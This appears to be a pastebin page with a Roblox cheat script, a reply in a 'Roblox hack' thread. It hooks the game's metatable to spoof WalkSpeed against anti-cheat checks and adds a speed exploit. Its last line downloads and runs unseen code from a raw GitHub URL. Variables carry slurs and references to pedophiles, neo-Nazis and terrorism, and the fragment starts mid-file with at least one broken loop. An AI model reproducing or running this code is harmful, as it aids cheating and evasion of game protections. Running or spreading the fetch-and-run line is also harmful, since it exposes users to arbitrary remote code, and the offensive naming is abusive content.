Facebook
From steveve, 11 Months ago, written in AppleScript.
This paste is a reply to Re: Re: Roblox hack from local games = { [{606849621} - view diff
Embed
Download Paste or View Raw
Hits: 249
  1. -- +++++++++++++++++++++++++++++++++++++++
  2.         Icon="rbxthumb://type=Asset&id=1332213374&w=150&h=150"
  3.        })
  4. end
  5.  
  6.  
  7. getgenv().TECHWAREWALKSPEED_LOADED = true
  8.  
  9.  
  10. wait(1.5)
  11.  
  12.  
  13. anunciar_atentado_terrorista("Welcome"..TeclasWS.tecla3.."")
  14.  
  15. -- // conexión
  16. esvastica.KeyDown:Connect(function(el_impostor)
  17.     if el_impostor:lower() == TeclasWS.tecla1:lower() then
  18.         velocidad_de_cum = velocidad_de_cum + 1
  19.         anunciar_atentado_terrorista(" (speed =   "..tostring(velocidad_de_cum)..")")
  20.     elseif el_impostor:lower() == TeclasWS.tecla2:lower() then
  21.         velocidad_de_cum = velocidad_de_cum - 1
  22.         anunciar_atentado_terrorista(" (speed =  "..tostring(velocidad_de_cum)..")")
  23.     elseif el_impostor:lower() == TeclasWS.tecla3:lower() then
  24.         if es_pedofilo then
  25.             es_pedofilo = false
  26.             anunciar_atentado_terrorista("speed off")
  27.         else
  28.             es_pedofilo = true
  29.             anunciar_atentado_terrorista("speed on")
  30.         end
  31.     end
  32. end)
  33.  
  34. -- // mi parte favorita: metametodos
  35. setreadonly(da_hood_rblxm_REAL,false)
  36. da_hood_rblxm_REAL.__index = newcclosure(function(BEST_ON_TOP,IS_GARBAGE)
  37.     local esPedofilo = checkcaller()
  38.     if IS_GARBAGE == "WalkSpeed" and not esPedofilo then
  39.         return lista_de_victimas_de_drizzy.CurrentWS
  40.     end
  41.     return CP_DE_DRIZZY(BEST_ON_TOP,IS_GARBAGE)
  42. end)
  43. da_hood_rblxm_REAL.__newindex = newcclosure(function(kaias,ip,logger)
  44.     local unNeonazi = checkcaller()
  45.     if es_pedofilo then
  46.         if ip == "WalkSpeed" and logger ~= 0 and not unNeonazi then
  47.             return CP(kaias,ip,velocidad_de_cum)
  48.         end
  49.     end
  50.     return CP(kaias,ip,logger)
  51. end)
  52. setreadonly(da_hood_rblxm_REAL,true)
  53.  
  54. repeat wait() until game:IsLoaded()
  55. local Players = game:service('Players')
  56. local Player = Players.LocalPlayer
  57.  
  58. repeat wait() until Player.Character
  59.  
  60. local userInput = game:service('UserInputService')
  61. local runService = game:service('RunService')
  62.  
  63. local Multiplier = -0.22
  64. local Enabled = false
  65. local whentheflashnoiq
  66.  
  67. userInput.InputBegan:connect(function(Key)
  68.     if Key.KeyCode == Enum.KeyCode.LeftBracket then
  69.         Multiplier = Multiplier + 0.01
  70.         print(Multiplier)
  71.         wait(0.2)
  72.         while userInput:IsKeyDown(Enum.KeyCode.LeftBracket) do
  73.             wait()
  74.             Multiplier = Multiplier + 0.01
  75.             print(Multiplier)
  76.         end
  77.     end
  78.  
  79.     if Key.KeyCode == Enum.KeyCode.RightBracket then
  80.         Multiplier = Multiplier - 0.01
  81.         print(Multiplier)
  82.         wait(0.2)
  83.         while userInput:IsKeyDown(Enum.KeyCode.RightBracket) do
  84.             wait()
  85.             Multiplier = Multiplier - 0.01
  86.             print(Multiplier)
  87.         end
  88.     end
  89.  
  90.     if Key.KeyCode == Enum.KeyCode.P then
  91.         Enabled = not Enabled
  92.         if Enabled == true then
  93.             repeat
  94.                 game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + game.Players.LocalPlayer.Character.Humanoid.MoveDirection * Multiplier
  95.                 game:GetService("RunService").Stepped:waitn()
  96.             until Enabled == true
  97.         end
  98.     end
  99. end)
  100.  
  101. if Fix == true then
  102.     loadstring(game:HttpGet("https://raw.githubusercontent.com/youtubetutorials123/helo/main/123"))()
  103. end

Replies to Re: Re: Re: Roblox hack rss

Title Name Language When
Re: Re: Re: Re: Roblox hack Steve applescript 11 Months ago.